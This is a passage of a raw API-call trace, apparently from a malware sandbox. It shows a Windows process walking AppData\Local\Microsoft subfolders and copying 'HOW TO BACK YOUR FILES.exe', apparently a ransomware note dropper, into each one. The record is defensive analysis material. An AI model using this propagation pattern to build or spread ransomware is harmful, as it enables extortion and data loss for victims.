0x120 [0111.066] GetLastError () returned 0x0 [0111.066] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3abef650, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4da71560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da71560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.066] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher" [0111.066] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher" [0111.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\publisher\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.067] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.068] GetLastError () returned 0x0 [0111.068] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4da71560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da71560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook" [0111.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook" [0111.068] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.068] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.069] GetLastError () returned 0x0 [0111.069] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3dc40980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6ca99f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca99f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.070] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" [0111.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" [0111.070] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.070] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.071] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.071] GetLastError () returned 0x0 [0111.071] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.071] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x609dab00, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6cac0060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cac0060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.072] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office" [0111.072] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office" [0111.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.073] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.073] GetLastError () returned 0x0 [0111.073] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.073] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4da976c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da976c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.073] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig" [0111.074] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig" [0111.074] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.074] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.074] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.075] GetLastError () returned 0x0 [0111.075] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.075] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb72310, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6cae61c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cae61c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.075] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove" [0111.075] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove" [0111.075] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.075] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.076] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.076] GetLastError () returned 0x0 [0111.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.077] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4dae3980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dae3980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.077] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User" [0111.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User" [0111.077] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.077] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\user\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.078] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.078] GetLastError () returned 0x0 [0111.078] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.078] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4dae3980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dae3980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.079] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System" [0111.079] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System" [0111.079] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.079] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\system\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.080] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.080] GetLastError () returned 0x0 [0111.080] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.080] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f780d90, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x4db09ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4db09ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.080] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0" [0111.081] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0" [0111.081] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.081] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.081] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.085] GetLastError () returned 0x0 [0111.085] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.085] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x197ec0b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4db09ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4db09ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.085] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache" [0111.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache" [0111.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.086] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.086] GetLastError () returned 0x0 [0111.087] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.087] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7a855a0, ftCreationTime.dwHighDateTime=0x1d3373f, ftLastAccessTime.dwLowDateTime=0x6cb585e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cb585e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.087] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player" [0111.087] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player" [0111.087] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.087] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.088] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.088] GetLastError () returned 0x0 [0111.088] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.088] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: 